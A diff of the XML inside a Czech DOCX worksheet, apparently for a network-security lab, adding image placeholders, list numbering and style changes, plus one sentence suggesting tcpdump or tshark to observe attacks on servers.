+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65CE6F86" wp14:editId="3B994471">
+            <wp:extent cx="6144482" cy="1076475"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
+            <wp:docPr id="122142677" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="122142677" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId51"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6144482" cy="1076475"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Pro zajímavost ještě můžete vyzkoušet </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tcpdump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> nebo </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tshark</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> na serverech, pro další vyobrazení útoků.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="547801EE" wp14:editId="194FDB80">
+            <wp:extent cx="6395085" cy="512445"/>
+            <wp:effectExtent l="0" t="0" r="5715" b="1905"/>
+            <wp:docPr id="750842455" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="750842455" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId52"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6395085" cy="512445"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:p/>
     <w:sectPr>
-      <w:headerReference w:type="even" r:id="rId22"/>
-      <w:footerReference w:type="even" r:id="rId23"/>
-      <w:footerReference w:type="default" r:id="rId24"/>
-      <w:headerReference w:type="first" r:id="rId25"/>
-      <w:footerReference w:type="first" r:id="rId26"/>
+      <w:headerReference w:type="even" r:id="rId53"/>
+      <w:footerReference w:type="even" r:id="rId54"/>
+      <w:footerReference w:type="default" r:id="rId55"/>
+      <w:headerReference w:type="first" r:id="rId56"/>
+      <w:footerReference w:type="first" r:id="rId57"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="780" w:right="1089" w:bottom="1312" w:left="1080" w:header="708" w:footer="718" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -1997,12 +5855,18 @@
       <w:t xml:space="preserve"> </w:t>
     </w:r>
     <w:r>
+      <w:rPr>
+        <w:sz w:val="22"/>
+      </w:rPr>
       <w:fldChar w:fldCharType="begin"/>
     </w:r>
     <w:r>
       <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
     </w:r>
     <w:r>
+      <w:rPr>
+        <w:sz w:val="22"/>
+      </w:rPr>
       <w:fldChar w:fldCharType="separate"/>
     </w:r>
     <w:r>
@@ -2595,6 +6459,118 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1A0A309C"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="1CB8078A"/>
+    <w:lvl w:ilvl="0" w:tplc="B306740A">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="777" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04050003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1497" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04050005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2217" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04050001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2937" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04050003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3657" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04050005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4377" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04050001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5097" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04050003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5817" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04050005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6537" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1C065BB1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B9AC87BE"/>
@@ -2806,7 +6782,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1E8B73C9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8FDEBA12"/>
@@ -3018,7 +6994,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3FF37D18"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C5480A54"/>
@@ -3230,7 +7206,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="478D3FBE"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7632C8DA"/>
@@ -3342,7 +7318,305 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4FBF25CF"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="6E88E8B8"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="540764CD"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="B038053A"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="67015894"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C4487830"/>
@@ -3554,7 +7828,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7BFD73A9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F752AFBC"/>
@@ -3767,25 +8041,34 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1972402102">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="1292322210">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="1059746071">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="2" w16cid:durableId="1292322210">
-    <w:abstractNumId w:val="3"/>
-  </w:num>
-  <w:num w:numId="3" w16cid:durableId="1059746071">
-    <w:abstractNumId w:val="1"/>
-  </w:num>
   <w:num w:numId="4" w16cid:durableId="79841361">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1912350091">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="1374890141">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="478502154">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="1058897472">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="1815872901">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="419060550">
+    <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
 </file>
@@ -4190,15 +8473,14 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normln">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="003E0DBB"/>
+    <w:rsid w:val="00092334"/>
     <w:pPr>
-      <w:spacing w:after="109" w:line="251" w:lineRule="auto"/>
-      <w:ind w:left="370" w:hanging="10"/>
+      <w:spacing w:before="120" w:after="109" w:line="252" w:lineRule="auto"/>
+      <w:ind w:left="368" w:hanging="11"/>
+      <w:jc w:val="both"/>
     </w:pPr>
     <w:rPr>
       <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-      <w:color w:val="000000"/>
-      <w:sz w:val="22"/>
     </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Nadpis1">
@@ -4207,7 +8489,7 @@
     <w:link w:val="Nadpis1Char"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
-    <w:rsid w:val="00370D9C"/>
+    <w:rsid w:val="00EE7246"/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
@@ -4219,7 +8501,7 @@
       <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
       <w:b/>
       <w:color w:val="000000"/>
-      <w:sz w:val="36"/>
+      <w:sz w:val="40"/>
     </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Nadpis2">
@@ -4229,7 +8511,7 @@
     <w:uiPriority w:val="9"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="00370D9C"/>
+    <w:rsid w:val="00066DC0"/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
@@ -4238,7 +8520,7 @@
       <w:outlineLvl w:val="1"/>
     </w:pPr>
     <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
+      <w:rFonts w:ascii="Arial" w:eastAsia="Courier New" w:hAnsi="Arial" w:cs="Courier New"/>
       <w:b/>
       <w:color w:val="000000"/>
       <w:sz w:val="32"/>
@@ -4252,7 +8534,7 @@
     <w:uiPriority w:val="9"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="00370D9C"/>
+    <w:rsid w:val="009A75C7"/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
@@ -4262,8 +8544,7 @@
     <w:rPr>
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
       <w:b/>
-      <w:color w:val="auto"/>
-      <w:sz w:val="28"/>
+      <w:sz w:val="32"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:default="1" w:styleId="Standardnpsmoodstavce">
@@ -4297,9 +8578,9 @@
     <w:name w:val="Nadpis 2 Char"/>
     <w:link w:val="Nadpis2"/>
     <w:uiPriority w:val="9"/>
-    <w:rsid w:val="00370D9C"/>
+    <w:rsid w:val="00066DC0"/>
     <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Courier New" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
+      <w:rFonts w:ascii="Arial" w:eastAsia="Courier New" w:hAnsi="Arial" w:cs="Courier New"/>
       <w:b/>
       <w:color w:val="000000"/>
       <w:sz w:val="32"/>
@@ -4309,12 +8590,12 @@
     <w:name w:val="Nadpis 1 Char"/>
     <w:link w:val="Nadpis1"/>
     <w:uiPriority w:val="9"/>
-    <w:rsid w:val="00370D9C"/>
+    <w:rsid w:val="00EE7246"/>
     <w:rPr>
       <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
       <w:b/>
       <w:color w:val="000000"/>
-      <w:sz w:val="36"/>
+      <w:sz w:val="40"/>
     </w:rPr>
   </w:style>
   <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid">
@@ -4348,7 +8629,6 @@
     </w:pPr>
     <w:rPr>
       <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cs="Times New Roman"/>
-      <w:color w:val="auto"/>
       <w:kern w:val="0"/>
       <w:szCs w:val="22"/>
       <w14:ligatures w14:val="none"/>
@@ -4451,11 +8731,11 @@
     <w:basedOn w:val="Standardnpsmoodstavce"/>
     <w:link w:val="Nadpis3"/>
     <w:uiPriority w:val="9"/>
-    <w:rsid w:val="00370D9C"/>
+    <w:rsid w:val="009A75C7"/>
     <w:rPr>
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
       <w:b/>
-      <w:sz w:val="28"/>
+      <w:sz w:val="32"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:styleId="Sledovanodkaz">
@@ -4522,6 +8802,36 @@
       <w:ind w:left="720"/>
       <w:contextualSpacing/>
     </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="FormtovanvHTML">
+    <w:name w:val="HTML Preformatted"/>
+    <w:basedOn w:val="Normln"/>
+    <w:link w:val="FormtovanvHTMLChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00802F9E"/>
+    <w:pPr>
+      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="FormtovanvHTMLChar">
+    <w:name w:val="Formátovaný v HTML Char"/>
+    <w:basedOn w:val="Standardnpsmoodstavce"/>
+    <w:link w:val="FormtovanvHTML"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00802F9E"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:eastAsia="Arial" w:hAnsi="Consolas" w:cs="Arial"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
   </w:style>
 </w:styles>
 </file>

--- a/~~Dlouhodobka~~/DOCX/Pracovni_list_smekama.docx
